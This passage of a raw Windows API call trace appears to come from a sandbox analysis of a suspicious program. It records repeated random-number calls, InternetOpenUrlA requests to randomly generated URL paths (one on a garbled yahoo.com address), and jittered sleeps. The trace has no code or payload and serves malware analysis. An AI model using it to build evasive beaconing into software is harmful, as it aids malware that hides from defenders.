pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0210.370] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.370] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.371] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0210.371] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1684d, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x3a1684d) returned 0x0 [0210.371] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.372] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.372] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0210.372] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.372] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.372] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0210.373] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0210.373] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.373] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.374] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0210.374] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.374] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.375] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.375] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.376] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0210.376] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0210.376] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.377] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.377] GetProcessHeap () returned 0x440000 [0210.377] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0210.377] lstrcpyA (in: lpString1=0x473770, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0210.377] lstrcatA (in: lpString1="\x04", lpString2="/bUJ9pSoq4lk4n6zeiivrhvKQs7IgxdxLAicfpzaXjc/c4Lv4a2vKyNk7zE2lqu72Y7yn6ciUdBh/i5b28rvUS8tzbdo2Ayostj/" | out: lpString1="\x04/bUJ9pSoq4lk4n6zeiivrhvKQs7IgxdxLAicfpzaXjc/c4Lv4a2vKyNk7zE2lqu72Y7yn6ciUdBh/i5b28rvUS8tzbdo2Ayostj/") returned="\x04/bUJ9pSoq4lk4n6zeiivrhvKQs7IgxdxLAicfpzaXjc/c4Lv4a2vKyNk7zE2lqu72Y7yn6ciUdBh/i5b28rvUS8tzbdo2Ayostj/" [0210.377] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0210.378] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/bUJ9pSoq4lk4n6zeiivrhvKQs7IgxdxLAicfpzaXjc/c4Lv4a2vKyNk7zE2lqu72Y7yn6ciUdBh/i5b28rvUS8tzbdo2Ayostj/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0210.378] GetProcessHeap () returned 0x440000 [0210.378] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0210.378] GetProcessHeap () returned 0x440000 [0210.378] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a16800 | out: hHeap=0x440000) returned 1 [0210.378] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0210.379] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0210.379] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0210.380] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0210.380] Sleep (dwMilliseconds=0x102bd) [0210.718] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0210.718] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0210.718] GetProcessHeap () returned 0x440000 [0210.718] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5870 [0210.718] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0210.718] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5871, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x4f5871) returned 0x0 [0210.718] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0210.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0210.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0210.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0210.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0210.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.721] GetProcessHeap () returned 0x440000 [0210.721] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0210.721] lstrcpyA (in: lpString1=0x473770, lpString2="(Y,Þs://www.yahoo.com" | out: lpString1="(Y,Þs://www.yahoo.com") returned="(Y,Þs://www.yahoo.com" [0210.721] lstrcatA (in: lpString1="(Y,Þs://www.yahoo.com", lpString2="/xrpw2553hpubcfFosv5l/" | out: lpString1="(Y,Þs://www.yahoo.com/xrpw2553hpubcfFosv5l/") returned="(Y,Þs://www.yahoo.com/xrpw2553hpubcfFosv5l/" [0210.722] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0210.722] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="(Y,Þs://www.yahoo.com/xrpw2553hpubcfFosv5l/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0210.722] GetProcessHeap () returned 0x440000 [0210.722] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0210.722] GetProcessHeap () returned 0x440000 [0210.722] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5870 | out: hHeap=0x440000) returned 1 [0210.722] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0210.722] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0210.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0210.723] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0210.723] Sleep (dwMilliseconds=0x1382a) [0211.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0211.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0211.080] GetProcessHeap () returned 0x440000 [0211.080] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0211.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0211.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x1f, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0211.081] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.081] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.084] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.084] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.084] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.085] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.085] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.085] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.085] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.086] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.086] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.086] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.088] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.088] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.088] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.089] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.089] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0211.089] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b270, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x3a1b270) returned 0x0 [0211.090] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.090] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.090] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.090] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.091] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.091] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.497] BCryptGenRandom (in: hAlgorithm=0x0, 